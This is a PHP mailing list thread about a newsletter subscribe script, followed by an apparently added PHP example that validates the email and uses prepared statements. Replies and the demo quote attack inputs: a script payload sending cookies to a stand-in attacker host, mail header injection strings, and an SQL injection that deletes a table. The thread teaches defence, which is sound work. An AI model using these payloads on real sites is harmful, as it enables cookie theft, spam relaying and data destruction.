Martin Norland wrote:
Jochem Maas wrote:
Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber
is already in a list before subscribing his email (so as to prevent
double subscription). the select part works fine....but the insert
doesn't. know why?
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'<script>
document.location =
"http://www.evilkid.net/?stolencookie"+document.cookie;
</script>';
or something like that? Just something to think about.
Then the malicious user gets to send their own cookies for this site to
another site of their choosing :P. I would be more worried about it
being equal to things like:
"Spam my Enemy <myenemy@xxxxxxxxxxx>"
+ "Spam my Enemy also <myenemy@xxxxxxxxxxx>"
+ etc.
or
"\r\nFrom: Idiots Inc. <official@xxxxxxxxxxxxxxxxxx>"
or
"'; Delete from arbitrary_table_name where 'yes'='yes"
ah yes - that would be an effective attack in/on an email ;-)
All of which are easily prevented with some attention to detail. (or in
some cases newer versions of software, which explicitly allow only one
statement per call). Finally - the concept of bind variables (or
equivalent) is your friend (as Jochem already knows with firebird iirc).
yes indeed! praise to the guy who wrote the new firebird extension :-),
savin' my ass on a daily basis :-)
Cheers,
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
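The fix the thread converges on (validate the address, then bind it instead of interpolating it), as an added example that is not code from the thread or from the original script; the `subscribers` table, its `email` column and the SQLite in-memory database are assumptions made for the demo.

```php
<?php
// Added example (not from the thread): validate the submitted address and
// use PDO prepared statements so the check-then-insert cannot be bent by
// the payloads discussed above. Table/column names are assumptions.

function subscribe(PDO $db, string $rawEmail): string
{
    // Normalise the same way the original script does.
    $email = strtolower(trim($rawEmail));

    // FILTER_VALIDATE_EMAIL rejects display names ("Spam my Enemy <...>"),
    // embedded CR/LF (mail header injection) and quote/semicolon payloads,
    // so the value is safe to echo back or to hand to mail() later.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return 'invalid';
    }

    // Bind variables: the address travels separately from the SQL text and
    // is never spliced into the statement, so quoting tricks do nothing.
    $check = $db->prepare('SELECT 1 FROM subscribers WHERE email = :email');
    $check->execute([':email' => $email]);
    if ($check->fetchColumn() !== false) {
        return 'already-subscribed';
    }

    $insert = $db->prepare('INSERT INTO subscribers (email) VALUES (:email)');
    $insert->execute([':email' => $email]);
    return 'subscribed';
}

// Demo wiring: an in-memory SQLite database stands in for the real one.
// The PRIMARY KEY also closes the race between the SELECT and the INSERT:
// a concurrent duplicate raises an exception instead of a second row.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE subscribers (email TEXT PRIMARY KEY)');

// Constructed inputs mirroring the cases raised in the thread.
foreach ([
    'someone@example.com',
    'SomeOne@example.com',                          // duplicate after lowercasing
    "x@example.com\r\nBcc: victim@example.com",     // header injection attempt
    "'; Delete from arbitrary_table_name where 'yes'='yes",
    '<script>document.location="http://evil.example/?"+document.cookie</script>',
] as $input) {
    echo json_encode($input), ' => ', subscribe($db, $input), PHP_EOL;
}
```

Expected results are `subscribed`, `already-subscribed`, and `invalid` for the remaining three inputs.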